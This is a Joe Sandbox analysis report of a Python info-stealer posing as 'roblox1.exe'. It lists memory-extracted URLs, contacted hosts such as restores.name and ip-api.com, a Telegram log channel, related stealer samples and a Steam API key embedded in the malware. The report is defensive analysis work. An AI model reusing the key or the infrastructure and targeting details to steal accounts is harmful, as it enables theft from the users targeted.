                                                                                                                                                  https://www.attrs.org/en/stable/changelog.htmlroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://docs.aiohttp.org/en/stable/web_advanced.html#application-s-configroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://cffi.readthedocs.io/en/latest/using.html#callbacksroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, stub.exe, 00000003.00000002.1962486464.00007FFBAAF8B000.00000002.00000001.01000000.0000000F.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://crl.xrampsecurity.com/XGCA.crl0stub.exe, 00000003.00000002.1945050010.00000213BE410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://thumbnails.roblox.com/v1/users/avatar?userIds=roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://www.cert.fnmt.es/dpcs/:1Ustub.exe, 00000003.00000002.1945050010.00000213BE410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://twitter.comarefereruhttps://twitter.com/homeusec-fetch-destaemptyusec-fetch-modeacorsusec-feroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://www.variomedia.de/roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown
                                                                                                                                                          https://bugs.python.org/issue37179roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940824169.00000213BED1E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937485075.00000213BECD9000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1944604841.00000213BE310000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                          		unknown
                                                                                                                                                          http://www.cert.fnmt.es/dpcs/stub.exe, 00000003.00000003.1936295098.00000213BEFDF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1939349578.00000213BEFEB000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1938008443.00000213BEFEB000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1945050010.00000213BE410000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1934931290.00000213BEFB8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936968912.00000213BEFE4000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1935684148.00000213BEFC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://packaging.python.org/specifications/entry-points/roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://www.accv.es00stub.exe, 00000003.00000003.1936295098.00000213BEFCD000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1939279507.00000213BEFBF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1934931290.00000213BEFB8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936295098.00000213BEFBF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1935684148.00000213BEFC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://www.reddit.com/user/roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://www.phys.uu.nl/~vgent/calendar/isocalendar.htmroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1944387821.00000213BE210000.00000004.00001000.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://github.com/pyca/cryptography/issuesstub.exe, 00000003.00000002.1949463983.00000213BF514000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://www.attrs.org/stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://mahler:8092/site-updates.pyroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1938065782.00000213BE603000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1945647945.00000213BE608000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://crl.securetrust.com/SGCA.crlstub.exe, 00000003.00000003.1938775730.00000213BED9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://www.python.org/download/releases/2.3/mro/.roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://github.comroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1946318506.00000213BE9A0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://docs.python.org/3/library/asyncio-eventloop.htmlroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1938094967.00000213BE55C000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1945319876.00000213BE561000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://discord.gg/roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://python.org/roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1938094967.00000213BE55C000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1945319876.00000213BE561000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1551783756.00000213BE59C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://peps.python.org/pep-0749/)-implementingroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://www.attrs.org/en/latest/glossary.html#term-dunder-methods)).roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        http://www.firmaprofesional.com/cps0stub.exe, 00000003.00000002.1948524629.00000213BEF1E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1934896216.00000213BEF0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://github.com/python-attrs/attrsroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1942471235.00000213BC233000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1549220598.00000213BC232000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1940038394.00000213BC232000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://t.me/TaroCloudFreelogs----------------------roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1936996426.00000213BEEAF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000003.1916641171.00000213BEEC8000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937485075.00000213BED4E000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1947969384.00000213BEEC0000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000002.1943034035.00000213BDE98000.00000004.00001000.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1916641171.00000213BEEB2000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1939941508.00000213BED89000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://api.steampowered.com/IPlayerService/GetSteamLevel/v1/?key=440D7F4D810EF9298D25EDDF37C1F902&sroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://crl.securetrust.com/SGCA.crl0stub.exe, 00000003.00000002.1943984108.00000213BE1BF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937231343.00000213BE1BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  http://crl.securetrust.com/STCA.crl0stub.exe, 00000003.00000002.1943984108.00000213BE1BF000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1937231343.00000213BE1BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://www.spotify.com/api/account-settings/v1/profileroblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1943280066.00000213BDF10000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6roblox1.exe, 00000000.00000003.1539994673.000001B300A2B000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1940431612.00000213BE4FA000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000000.1547789745.00007FF7D06EF000.00000002.00000001.01000000.00000004.sdmp, stub.exe, 00000003.00000002.1945192279.00000213BE4FC000.00000004.00000020.00020000.00000000.sdmp, stub.exe, 00000003.00000003.1552093383.00000213BE4C3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high

                                                                                                                                                                                                        World Map of Contacted IPs

                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                        • 75% < No. of IPs

                                                                                                                                                                                                        Public IPs

                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                        208.95.112.1
                                                                                                                                                                                                        		ip-api.comUnited States
                                                                                                                                                                                                        		53334TUT-ASUSfalse
                                                                                                                                                                                                        135.181.65.219
                                                                                                                                                                                                        		restores.nameGermany
                                                                                                                                                                                                        		24940HETZNER-ASDEfalse

                                                                                                                                                                                                        Private

                                                                                                                                                                                                        IP
                                                                                                                                                                                                        127.0.0.1

                                                                                                                                                                                                        General Information

                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                        Analysis ID:1577530
                                                                                                                                                                                                        Start date and time:2024-12-18 15:07:16 +01:00
                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                        Overall analysis duration:0h 10m 54s
                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                        Number of analysed new started processes analysed:63
                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                        Sample name:roblox1.exe
                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                        Classification:mal100.spre.phis.troj.spyw.evad.winEXE@110/57@2/3
                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                        • Successful, ratio: 25%
                                                                                                                                                                                                        HCA Information:Failed
                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                        • Found application associated with file extension: .exe

                                                                                                                                                                                                        Warnings

                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 4.245.163.56, 23.218.208.109, 13.107.246.63
                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                        • Execution Graph export aborted for target mshta.exe, PID 2752 because there are no executed function
                                                                                                                                                                                                        • Execution Graph export aborted for target powershell.exe, PID 4424 because it is empty
                                                                                                                                                                                                        • Execution Graph export aborted for target roblox1.exe, PID 1364 because it is empty
                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                        • VT rate limit hit for: roblox1.exe

                                                                                                                                                                                                        Simulations

                                                                                                                                                                                                        Behavior and APIs

                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                        09:08:27API Interceptor5x Sleep call for process: WMIC.exe modified
                                                                                                                                                                                                        09:08:54API Interceptor16x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                        09:08:58API Interceptor8x Sleep call for process: stub.exe modified

                                                                                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                                                                                        IPs

                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        208.95.112.1roblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                                                                                                                                        • ip-api.com/json
                                                                                                                                                                                                        random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                        • ip-api.com/json
                                                                                                                                                                                                        x.ps1Get hashmaliciousQuasarBrowse
                                                                                                                                                                                                        • ip-api.com/json/
                                                                                                                                                                                                        Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                        • ip-api.com/json/
                                                                                                                                                                                                        Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                        • ip-api.com/json/
                                                                                                                                                                                                        Shipping Bill6239999 dated 13122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                        • ip-api.com/json/
                                                                                                                                                                                                        Creal.exeGet hashmaliciousBlackshadesBrowse
                                                                                                                                                                                                        • ip-api.com/json/
                                                                                                                                                                                                        factura 000601.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                        Orden de compra_#000000090764534236475890765432567890765768978687569867970875766868.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                        msedge.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                        • ip-api.com/line/?fields=hosting
                                                                                                                                                                                                        135.181.65.219roblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                                                                                                                                          random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                            SecuriteInfo.com.Win64.Malware-gen.19901.26035.exeGet hashmaliciousPython Stealer, Monster StealerBrowse

                                                                                                                                                                                                              Domains

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              ip-api.comroblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              x.ps1Get hashmaliciousQuasarBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              https://funcilnewshical.com/76e41238-e8a4-483e-8f1d-ad83b34d4805?batchid=Douglasgrimes-Testsetup&carrier=carrier&textid=textid&brand=register.douglasgrimes.com&source=source&messageId=messageId&name=Lisa&phone=phone&step=step&domain=domain&cost=costGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 208.95.112.2
                                                                                                                                                                                                              Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              Shipping Bill6239999 dated 13122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              Creal.exeGet hashmaliciousBlackshadesBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              factura 000601.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              Orden de compra_#000000090764534236475890765432567890765768978687569867970875766868.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              restores.nameroblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                                                                                                                                              • 135.181.65.219
                                                                                                                                                                                                              random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                              • 135.181.65.219
                                                                                                                                                                                                              SecuriteInfo.com.Win64.Malware-gen.19901.26035.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                                                                                                                                              • 135.181.65.219
                                                                                                                                                                                                              SecuriteInfo.com.Win64.Evo-gen.11830.19095.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                                                                                                                                              • 89.248.174.171
                                                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Cryptbot, PureLog Stealer, RedLine, SmokeLoader, StealcBrowse
                                                                                                                                                                                                              • 89.248.174.171
                                                                                                                                                                                                              file.exeGet hashmaliciousPython Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, Stealc, VidarBrowse
                                                                                                                                                                                                              • 89.248.174.171
                                                                                                                                                                                                              JGKjBsQrMc.exeGet hashmaliciousAmadey, Babadeda, RedLine, Stealc, VidarBrowse
                                                                                                                                                                                                              • 65.0.21.192
                                                                                                                                                                                                              KfxEYxBsJm.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                                                                                                                                              • 65.0.21.192
                                                                                                                                                                                                              SecuriteInfo.com.Python.Stealer.1548.11147.30861.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                                                                                                                                              • 65.0.21.192
                                                                                                                                                                                                              SecuriteInfo.com.Win64.Evo-gen.16643.7451.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                                                                                                                                              • 65.0.21.192

                                                                                                                                                                                                              ASNs

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              HETZNER-ASDEroblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                                                                                                                                              • 135.181.65.219
                                                                                                                                                                                                              loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                              • 195.201.143.203
                                                                                                                                                                                                              random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                              • 135.181.65.219
                                                                                                                                                                                                              mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                                                              • 116.202.93.69
                                                                                                                                                                                                              3.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 136.243.79.47
                                                                                                                                                                                                              5.msiGet hashmaliciousDanaBot, NitolBrowse
                                                                                                                                                                                                              • 148.251.107.246
                                                                                                                                                                                                              Setup.msiGet hashmaliciousVidarBrowse
                                                                                                                                                                                                              • 116.203.12.114
                                                                                                                                                                                                              https://6movies.stream/series/cobra-kai-80711/6-4/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 136.243.81.150
                                                                                                                                                                                                              uEhN67huiV.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 116.202.150.27
                                                                                                                                                                                                              JkICQ13OOY.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 5.9.121.207
                                                                                                                                                                                                              TUT-ASUSroblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              x.ps1Get hashmaliciousQuasarBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              https://funcilnewshical.com/76e41238-e8a4-483e-8f1d-ad83b34d4805?batchid=Douglasgrimes-Testsetup&carrier=carrier&textid=textid&brand=register.douglasgrimes.com&source=source&messageId=messageId&name=Lisa&phone=phone&step=step&domain=domain&cost=costGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                              • 208.95.112.2
                                                                                                                                                                                                              Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              Shipping Bill6239999 dated 13122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              Creal.exeGet hashmaliciousBlackshadesBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              factura 000601.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                                                                                              • 208.95.112.1
                                                                                                                                                                                                              Orden de compra_#000000090764534236475890765432567890765768978687569867970875766868.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                              • 208.95.112.1

                                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                                              No context

                                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_asyncio.pydroblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                                                                                                                                                random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                  end.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                    file.exeGet hashmaliciousScreenConnect Tool, Amadey, LummaC Stealer, PureLog Stealer, Vidar, XmrigBrowse
                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                                        file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                            SecuriteInfo.com.Win64.Malware-gen.19901.26035.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                                                                                                                                                                              SecuriteInfo.com.Trojan.PWS.Stealer.39881.9434.15338.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                file.exeGet hashmaliciousPython Stealer, Amadey, Cryptbot, Monster Stealer, PureLog Stealer, RedLine, SmokeLoaderBrowse

                                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:dropped
